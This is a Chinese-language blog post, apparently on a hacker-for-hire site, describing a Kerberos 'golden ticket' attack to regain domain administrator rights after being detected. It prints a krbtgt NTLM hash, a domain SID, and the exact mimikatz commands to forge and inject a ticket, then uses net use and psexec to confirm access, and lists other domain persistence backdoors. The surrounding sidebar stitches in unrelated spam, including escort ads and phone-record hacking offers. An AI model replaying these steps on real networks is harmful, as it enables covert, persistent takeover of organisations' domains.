渗透技术|域渗透的金之钥匙

hacker4年前关于黑客接单362

  最近几年很少搞内网渗透了,这几年发展的快啊,看了A牛翻译的 ,发现趋势都是powershell脚本化了。想当年遇到的域控都是windows 2003的,找朋友要些vbscript脚本自动化,然后那啥那啥的。现在搞域除了前段时间出的MS14068,还有龙哥翻译的,不知道还有什么新 *** ,心中还有 *** ,如果想交流的朋友,可以加我聊聊。

  我原来发过一个微博说

  

  这就是我说的金之钥匙【"golden ticket(s)"黄金票据】,利用这个的条件是你在原来搞定域控的时候,已经导出过域用户的HASH,尤其是krbtgt 这个用户的。但是在你在内网干其他事情的时候,活儿不细,被人家发现了,你拥有的域管理员权限掉了,你现在还有一个普通的域用户权限,管理员做加固的时候又忘记修改krbtgt密码了(很常见),我们还是能重新回来,步骤如下:

  要重新拿回域管理员权限,首先要先知道域内的管理员有谁

  我这里的实验环境,通过截图可以看到域管理员是administrator

  我还要知道域SID是啥

  我的域SID是

  还有最重要的krbtgt用户的ntlm哈希,我原来导出的是

  krbtgt(current-disabled):502:aad3b435b51404eeaad3b435b51404ee:6a8e501fabcf264c70 ef3316c6aab7dc:::

  

  然后该用神器mimikatz出场了,依次执行

  mimikatz # kerberos::purge

  mimikatz # kerberos::golden /admin:Administrator /domain:pentstlab.com /sid:S-1-5-21-3883552807-251258116-2724407435 /krbtgt:6a8e501fabcf264c70ef3316c6aab7dc /ticket:Administrator.kiribi

  mimikatz # kerberos::ptt Administrator.kiribi

  mimikatz # kerberos::tgt

  

  到现在,我们又重新拥有域管理员权限了,可以验证下

  E:\>net use \\WIN-0DKN2AS0T2G\c$

  E:\>psexec.exe \\WIN-0DKN2AS0T2G cmd

  

  呃,感觉这个 *** 比http://drops.wooyun.org/tips/9297这个方便些,文章写了好久了,一直凑不出更多的字数,就没发。。嗯。。。懒了。。

  当然除了golden ticket,silver ticket之外还有kerberos ticket,历史SID,AdminSDHolder,DSRM,GPP,DCSync等技术手段都可以用来当做域控的隐藏后门。

  【原文:域渗透的金之钥匙 作者:mickey 安全脉搏整理发布】

标签: 渗透测试

相关文章

农村怎么发财致富?电商服务站让你赚钱人生第

农村怎么发财致富?电商服务站让你赚钱人生第

开农村电商服务站怎么样?能赚钱吗? 首先明确地说,农村电商服务站能赚钱,是非常阳光的选择。农村电商是近两年发展起来的新型商业模式,发展速度相当快,两年内遍地全国各地农村的村村寨寨,是农民非常喜欢...

北京高端儿兼职儿 怎么在线预约哪里找吕玉凤

北京高端小学妹兼职小学妹 怎么在线预约哪里找【吕玉凤】,上海是一座成功人士的聚集地,对商业模特的需求也是比较大的,今天明星商务分享模特访梦,年龄天津 女 30,婚姻:未婚,学历:高中,气质:北京高端小...

淘宝的id号是什么(教你查看淘宝id账号的方法)

淘宝的id号是什么(教你查看淘宝id账号的方法)

不容易也有人不清楚手机微信早已能够「改微信号」了吧?不会吧,不会吧。油头文艺青年总算能够擦去微信号码上那抹少骄狂的非主流女生;重回单身的总算能够道别微信号码上的前男/女朋友(名字拼音);高龄不婚族...

找黑客查手机通话记录,黑客技术软件网站

一、查手机通话记录怎么找黑客 1、盗游戏号怎么接单黑客长期以来,有一个专家级程序员和一个在线专家共享文化社区,其历史可追溯到几十年前第一台分时共享的小型和第一台ARPAne。查手机通话记录刷访客量阅读...

酒店行业遇上互联网+,营销运营怎么做?

酒店行业遇上互联网+,营销运营怎么做?

一场抗疫行动再次将传统行业的互联网+推向高潮,本文作者分享了自己多年前帮助某酒店进行互联网布局的方案,希望借助线上线下的结合在2020年酒店行业能实现实质性的突破。 2020年的这个新年一场新冠肺炎...